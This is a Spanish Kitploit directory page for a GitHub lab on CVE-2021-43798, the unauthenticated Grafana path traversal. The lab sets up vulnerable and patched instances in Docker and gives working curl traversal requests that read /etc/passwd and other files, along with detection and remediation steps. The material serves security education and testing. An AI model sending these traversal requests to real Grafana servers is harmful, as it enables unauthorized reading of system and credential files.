Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/shivamg2004/-ine_shivam_gupta_23104003
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
shivamg2004/-ine_shivam_gupta_23104003

-INE_Shivam_Gupta_23104003

CVE-2021-43798 Grafana Path Traversal No Autenticado - Security Lab | Shivam Gupta | 23104003

Ver Repositorio
hace 6h 45mAún no revisado

CVE-2021-43798 — Laboratorio de Path Traversal No Autenticado en Grafana

Solo para uso educativo. Ejecuta este laboratorio únicamente en una máquina local aislada. Nunca lo expongas a internet.


Resumen del CVE

CampoDetalle
ID del CVECVE-2021-43798
ProductoGrafana
Versiones afectadas8.0.0 – 8.3.0
Versión parcheada8.3.1+
SeveridadAlta
Puntuación CVSS v3.17.5
CWECWE-22 — Path Traversal
Autenticación requeridaNinguna
Vector de ataqueRed

Requisitos previos

  • Docker Desktop (en ejecución)
  • Git
  • curl

Configuración

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta

Iniciar el entorno vulnerable

root@kitploit:~
docker compose up -d

Verificar:

root@kitploit:~
curl http://127.0.0.1:3000/api/health
# Expected: "version": "8.3.0"

Abre http://127.0.0.1:3000 — usuario: admin / admin


Explotar la vulnerabilidad

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"

Esperado: contenido del archivo devuelto con HTTP 200 — no se requiere autenticación.


Detección

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health

Si se devuelve el hostname → VULNERABLE. Versión 8.0.0–8.3.0 → VULNERABLE.


Remediación

Iniciar la instancia parcheada (Grafana 8.3.1):

root@kitploit:~
docker compose -f docker-compose.patched.yml up -d

Verificar que el exploit está bloqueado:

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Expected: {"message": "Plugin file not found"}

Detener el laboratorio

root@kitploit:~
docker compose down
docker compose -f docker-compose.patched.yml down

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-and-7.5.12-released-with-moderate-severity-security-fix/
  • https://cwe.mitre.org/data/definitions/22.html
Descargar herramienta